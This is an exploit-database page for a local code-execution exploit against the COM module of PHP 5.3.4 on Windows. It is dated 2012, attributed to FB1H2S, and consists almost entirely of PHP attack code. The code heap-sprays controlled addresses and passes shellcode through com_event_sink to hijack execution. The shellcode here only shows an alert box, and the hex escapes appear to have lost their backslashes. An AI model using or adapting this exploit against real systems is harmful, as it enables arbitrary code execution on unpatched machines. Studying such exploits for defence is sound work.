[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : PHP 5.3.4 Win Com Module Com_sink Exploit
# Published : 2012-10-11
# Author :
# Previous Title : OS X Local Root Exploit for Viscosity OpenVPN Client
# Next Title : Internet Download Manager All Versions Stack Based Buffer Overflow


# Exploit Title: PHP 5.3.4 Win Com Module Com_sink Local Exploit
# Google Dork: Nil
# Date: 9/10/2012
# Author: FB1H2S
# Software Link: PHP Windows
# Version: [5.3.4]
# Tested on: Microsoft XP Pro 2002 SP2
 
<?php
 //PHP 5.3.4 
 
 //
//$eip ="x44x43x42x41";
$eip= "x4bxe8x57x78";
$eax ="x80x01x8dx04";
$deodrant="";
$axespray = str_repeat($eip.$eax,0x80);

//048d0190
echo strlen($axespray);
echo  "PHP 5.3.4 WIN Com Module COM_SINK 0-dayn" ;
echo  "By Rahul Sasi : http://twitter.com/fb1h2sn" ;
echo  "Exploit Tested on:n Microsoft XP Pro 2002 SP2 n" ;
echo  "More Details Here:n http://www.garage4hackers.com/blogs/8/web-app-remote-code-execution-via-scripting-engines-part-1-local-exploits-php-0-day-394/n" ;


//19200 ==4B32 4b00
for($axeeffect=0;$axeeffect<0x4B32;$axeeffect++)
{
    $deodrant.=$axespray;
}


$terminate = "T";

$u[] =$deodrant;

$r[] =$deodrant.$terminate;
$a[] =$deodrant.$terminate;
$s[] =$deodrant.$terminate;

 
//$vVar = new VARIANT(0x048d0038+$offset); // This is what we controll
$vVar = new VARIANT(0x048d0000+180); 
//alert box Shellcode 
$buffer = "x90x90x90".
          "xB9x38xDDx82x7Cx33xC0xBB".
            "xD8x0Ax86x7Cx51x50xFFxd3";

$var2 = new VARIANT(0x41414242);

com_event_sink($vVar,$var2,$buffer);



 
?>